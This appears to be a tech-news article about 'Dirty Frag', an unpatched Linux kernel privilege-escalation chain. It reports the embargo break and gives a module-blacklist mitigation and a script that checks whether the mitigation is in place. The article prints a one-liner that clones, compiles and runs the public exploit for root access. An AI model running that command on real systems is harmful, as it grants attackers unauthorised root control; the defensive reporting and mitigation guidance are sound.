Your Linux Box Has Been Vulnerable For 9 Years and Nobody Knew

Security researcher Hyunwoo Kim just dropped a bomb on the Linux community. Meet Dirty Frag, the latest “Dirty” vulnerability that gives attackers root access on basically every major Linux distribution you’re running right now.

And it’s completely unpatched. Even in kernel 7.0.4 that dropped today.

The Damage

This isn’t some theoretical exploit that needs perfect timing and a PhD to pull off. Dirty Frag chains two separate page-cache vulnerabilities (xfrm-ESP and RxRPC) into a single, deterministic attack. Translation: it works almost every time, doesn’t crash your kernel when it fails, and requires zero race conditions.

The xfrm-ESP bug has been sitting in the kernel since January 2017. That’s nine years of exposure. The RxRPC component is newer (June 2023), but it’s the combo that makes this dangerous.

One Command, Root Access

The exploit is literally a one-liner:

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Kim tested this on Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44, and more. It worked on all of them. RHEL 8 is confirmed vulnerable. Debian users report mixed results.

Why Two Bugs?

The xfrm-ESP vulnerability gives you a powerful 4-byte write primitive but needs namespace creation privileges. Ubuntu sometimes blocks that through AppArmor. The RxRPC bug doesn’t need those privileges but the module isn’t loaded everywhere.

Except Ubuntu loads rxrpc by default.

By chaining both, Kim covered all the blind spots. Every major distro falls to at least one of these exploits.

The Embargo Disaster

Here’s where it gets messy. An unrelated third party broke the embargo before patches were ready. The community is livid. One researcher called it “inconsiderate and selfish” for announcing the vulnerability before the kernel team’s embargo date.

CVE-2026-43284 (xfrm-ESP) was assigned and patched in the mainline kernel yesterday. CVE-2026-43500 (RxRPC) has been reserved, but there’s no patch in any tree yet.

That means millions of Linux systems are exposed right now with public exploit code available. This is the second major local privilege escalation leaked without patches in two weeks.

The Copy Fail Connection

Remember Copy Fail? Same bug class. Dirty Frag even shares the same sink as Copy Fail for the xfrm-ESP component. But here’s the kicker: if you applied the Copy Fail mitigation (blacklisting algif_aead), you’re still vulnerable. Dirty Frag doesn’t need that module.

Oh, and there’s a copyfail2 out now too. Similar trick, different subsystem. Fun times.

Temporary Fix (With Consequences)

Until your distro backports the patches, Kim recommends this mitigation:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

But here’s the catch: this breaks IPsec and RxRPC. If you’re using IPsec VPNs or the AFS distributed file system, you’re choosing between security and functionality. Pick your poison.
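If you roll the mitigation out across a fleet, you also want a way to confirm it actually took: that none of the three modules is still loaded and that each one is blacklisted in modprobe.d. The script below is an added example written for this article, not something from Kim’s writeup or the dirtyfrag repository. It reads /proc/modules and /etc/modprobe.d on a real host, but takes the paths as arguments so it can be run here against constructed sample input; the sample data and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original article: verify whether the Dirty Frag
# module-blacklist mitigation is in effect on a host.

# Kernel modules the recommended mitigation disables.
DIRTYFRAG_MODULES="esp4 esp6 rxrpc"

# loaded_modules FILE
#   Print the names from DIRTYFRAG_MODULES that appear as loaded modules in FILE.
#   FILE is normally /proc/modules, whose first field on each line is the module name.
loaded_modules() {
    file="$1"
    found=""
    for m in $DIRTYFRAG_MODULES; do
        if awk -v mod="$m" '$1 == mod { hit = 1 } END { exit !hit }' "$file"; then
            found="$found $m"
        fi
    done
    echo "${found# }"
}

# unblocked_modules DIR
#   Print the names from DIRTYFRAG_MODULES that have no "install <mod> /bin/false"
#   line in any *.conf file under DIR (normally /etc/modprobe.d). Without that line
#   the module can simply be autoloaded again after a reboot or on first use.
unblocked_modules() {
    dir="$1"
    missing=""
    for m in $DIRTYFRAG_MODULES; do
        if ! cat "$dir"/*.conf 2>/dev/null |
             grep -Eq "^[[:space:]]*install[[:space:]]+$m[[:space:]]+/bin/false"; then
            missing="$missing $m"
        fi
    done
    echo "${missing# }"
}

# mitigation_status PROC_MODULES MODPROBE_DIR
#   Print "mitigated" only if no target module is loaded AND all are blacklisted;
#   anything less is reported as "exposed".
mitigation_status() {
    if [ -z "$(loaded_modules "$1")" ] && [ -z "$(unblocked_modules "$2")" ]; then
        echo mitigated
    else
        echo exposed
    fi
}

# Constructed sample input so the script runs offline. On a real host pass
# /proc/modules and /etc/modprobe.d instead. This sample models a box where the
# admin blacklisted only the esp modules and never unloaded anything.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/modules" <<'EOF'
rxrpc 1234567 0 - Live 0x0000000000000000
esp4 40960 0 - Live 0x0000000000000000
xfrm_algo 16384 1 esp4, Live 0x0000000000000000
EOF
mkdir -p "$SAMPLE_DIR/modprobe.d"
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\n' > "$SAMPLE_DIR/modprobe.d/partial.conf"

echo "loaded:    $(loaded_modules "$SAMPLE_DIR/modules")"
echo "unblocked: $(unblocked_modules "$SAMPLE_DIR/modprobe.d")"
echo "status:    $(mitigation_status "$SAMPLE_DIR/modules" "$SAMPLE_DIR/modprobe.d")"
```

On the sample data this reports esp4 and rxrpc as still loaded and rxrpc as not blacklisted, so the status is "exposed". Both checks matter: rmmod alone leaves the module free to autoload again, and the modprobe.d line alone does nothing about a module that is already resident until you unload it or reboot.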

One Reddit user noted that kernel lockdown might prevent or limit exploitation, but that’s not confirmed yet.

Why “Dirty Frag”?

Kim explains the name derives from Dirty Pipe (its ancestor) and the fact that it “dirties” the frag member of struct sk_buff. Yes, we have another branded “Dirty” vulnerability. Get used to it.

What Now?

Check if your distro has released patches. Update immediately when available. If you’re running production systems and can afford to break IPsec, apply the mitigation now and reboot or clear your page cache.

The full technical writeup is at dirtyfrag.io. It’s worth reading if you want to understand how badly the page-cache write primitives can be abused.

Nine years is a long time to leave the door open. And finding out through an embargo break on a Friday? That’s just cruel.
